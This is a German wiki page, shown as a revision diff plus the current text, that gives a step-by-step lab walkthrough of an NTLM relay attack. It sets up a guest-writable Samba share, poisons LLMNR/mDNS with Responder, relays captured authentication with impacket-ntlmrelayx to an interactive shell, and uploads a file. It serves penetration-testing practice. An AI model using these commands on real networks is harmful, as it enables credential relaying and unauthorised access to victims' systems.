NTLM-Relay auf Samba-Freigabe mit Impacket: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 1: | Zeile 1: | ||
| − | = NTLM-Relay auf Samba-Freigabe mit Impacket | + | = NTLM-Relay auf Samba-Freigabe mit Impacket = |
== Ziel == | == Ziel == | ||
| − | Ein Windows-Client im | + | Ein Windows-Client im selben Netz wird über LLMNR oder mDNS vergiftet. Seine NTLM-Authentifizierung wird durch den Angreifer mit ntlmrelayx auf einen Samba-Server weitergeleitet. Der relayed Benutzer erhält Gastzugriff auf eine vorbereitete Freigabe. Der Angreifer kann darüber Dateien ablegen oder einsehen. |
| − | |||
| − | |||
| − | == | + | == Samba-Ziel vorbereiten == |
| − | |||
| − | |||
| − | |||
| − | |||
| − | + | *Samba-Konfiguration anpassen: | |
| + | nano /etc/samba/smb.conf | ||
| − | |||
<pre> | <pre> | ||
[global] | [global] | ||
| Zeile 34: | Zeile 28: | ||
</pre> | </pre> | ||
| − | *Verzeichnis vorbereiten: | + | *Verzeichnis vorbereiten: |
mkdir -p /mnt/media/share | mkdir -p /mnt/media/share | ||
chown nobody:nogroup /mnt/media/share | chown nobody:nogroup /mnt/media/share | ||
chmod 777 /mnt/media/share | chmod 777 /mnt/media/share | ||
| − | * | + | *Samba neu starten: |
systemctl restart smbd | systemctl restart smbd | ||
| − | == | + | == LLMNR/mDNS-Poisoning aktivieren == |
| + | *Responder starten: | ||
responder -I eth0 | responder -I eth0 | ||
| − | + | == NTLM-Relay aktivieren == | |
| − | + | *Relay starten mit interaktivem SMB-Zugriff: | |
| − | |||
| − | * | ||
impacket-ntlmrelayx -t smb://10.0.10.104 -smb2support -i --no-http-server --no-wcf-server --no-raw-server | impacket-ntlmrelayx -t smb://10.0.10.104 -smb2support -i --no-http-server --no-wcf-server --no-raw-server | ||
| − | + | == NTLM-Angriff auslösen == | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| + | *Am Windows-Client im Explorer ausführen: | ||
\\irgendwas | \\irgendwas | ||
| − | + | *Der Client sendet eine vergiftbare Anfrage, wird relayed und landet mit seinen SMB-Anmeldedaten beim Samba-Ziel. | |
| − | == | + | == Erfolgreichen Zugriff nutzen == |
| − | Nach | + | *Nach erfolgreicher Authentifizierung erscheint im Terminal: |
| − | + | [!] Interactive shell opened | |
| − | |||
| − | |||
| − | [!] Interactive shell opened | ||
| − | |||
| − | |||
| − | *Dort | + | *Dort können Befehle abgesetzt werden: |
| − | upload /tmp/ | + | ls |
| + | upload /tmp/beispiel.txt | ||
| + | exit | ||
| − | + | *Die Datei liegt anschließend im Share-Verzeichnis auf dem Zielsystem: | |
| − | |||
| − | |||
ls -l /mnt/media/share | ls -l /mnt/media/share | ||
| − | + | == Ergebnis == | |
| − | + | NTLM-Relay wurde erfolgreich durchgeführt. Der relayed Benutzer konnte ohne gültige Authentifizierung auf eine Samba-Freigabe zugreifen und dort Dateien ablegen. | |
| − | == | ||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
Version vom 18. Mai 2025, 12:45 Uhr
NTLM-Relay auf Samba-Freigabe mit Impacket
Ziel
Ein Windows-Client im selben Netz wird über LLMNR oder mDNS vergiftet. Seine NTLM-Authentifizierung wird durch den Angreifer mit ntlmrelayx auf einen Samba-Server weitergeleitet. Der relayed Benutzer erhält Gastzugriff auf eine vorbereitete Freigabe. Der Angreifer kann darüber Dateien ablegen oder einsehen.
Samba-Ziel vorbereiten
- Samba-Konfiguration anpassen:
nano /etc/samba/smb.conf
[global] workgroup = WORKGROUP server role = standalone server passdb backend = tdbsam map to guest = Bad User guest account = nobody [share] comment = Relayziel path = /mnt/media/share read only = no guest ok = yes public = yes browseable = yes force user = nobody force group = nogroup
- Verzeichnis vorbereiten:
mkdir -p /mnt/media/share chown nobody:nogroup /mnt/media/share chmod 777 /mnt/media/share
- Samba neu starten:
systemctl restart smbd
LLMNR/mDNS-Poisoning aktivieren
- Responder starten:
responder -I eth0
NTLM-Relay aktivieren
- Relay starten mit interaktivem SMB-Zugriff:
impacket-ntlmrelayx -t smb://10.0.10.104 -smb2support -i --no-http-server --no-wcf-server --no-raw-server
NTLM-Angriff auslösen
- Am Windows-Client im Explorer ausführen:
\\irgendwas
- Der Client sendet eine vergiftbare Anfrage, wird relayed und landet mit seinen SMB-Anmeldedaten beim Samba-Ziel.
Erfolgreichen Zugriff nutzen
- Nach erfolgreicher Authentifizierung erscheint im Terminal:
[!] Interactive shell opened
- Dort können Befehle abgesetzt werden:
ls upload /tmp/beispiel.txt exit
- Die Datei liegt anschließend im Share-Verzeichnis auf dem Zielsystem:
ls -l /mnt/media/share
Ergebnis
NTLM-Relay wurde erfolgreich durchgeführt. Der relayed Benutzer konnte ohne gültige Authentifizierung auf eine Samba-Freigabe zugreifen und dort Dateien ablegen.